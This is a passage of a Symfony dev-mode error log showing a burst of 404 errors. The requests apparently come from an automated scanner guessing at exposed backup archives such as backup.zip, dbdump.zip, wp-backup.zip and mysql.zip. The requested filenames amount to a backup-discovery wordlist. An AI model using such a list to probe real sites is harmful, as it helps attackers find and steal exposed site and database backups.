  3298. [2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /rest.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /rest.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3299. [2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /apps.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /apps.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3300. [2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /videos.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /videos.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3301. [2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /applications.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /applications.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3302. [2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /graphql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /graphql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3303. [2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /postgresql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /postgresql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3304. [2025-12-18 06:23:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /db.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /db.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3305. [2025-12-18 06:23:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /json.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /json.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3306. [2025-12-18 06:23:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-site.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-site.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3307. [2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webapps.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webapps.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3308. [2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /domains.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /domains.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3309. [2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-20240527.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-20240527.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3310. [2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /domain.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /domain.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3311. [2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3312. [2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3313. [2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-files.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-files.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3314. [2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /upload.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /upload.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3315. [2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-full.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-full.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3316. [2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /uploads.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /uploads.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3317. [2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-complete.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-complete.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3318. [2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-20240527.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-20240527.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3319. [2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mysql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mysql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3320. [2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sqlserver.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sqlserver.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3321. [2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dbdump.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dbdump.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3322. [2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /rpc.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /rpc.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3323. [2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /base.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /base.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3324. [2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /neo4j.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /neo4j.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3325. [2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dbadmin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dbadmin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3326. [2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mssql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mssql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3327. [2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dbase.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dbase.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3328. [2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3329. [2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /oracle.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /oracle.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3330. [2025-12-18 06:23:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_monthly.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_monthly.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3331. [2025-12-18 06:23:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /bak.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /bak.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3332. [2025-12-18 06:23:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cassandra.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cassandra.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3333. [2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /snapshot.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /snapshot.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3334. [2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_weekly.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_weekly.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3335. [2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_4.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_4.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3336. [2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_5.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_5.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3337. [2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /audio.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /audio.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3338. [2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-2024.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-2024.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3339. [2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /resources.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /resources.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3340. [2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /gallery.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /gallery.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
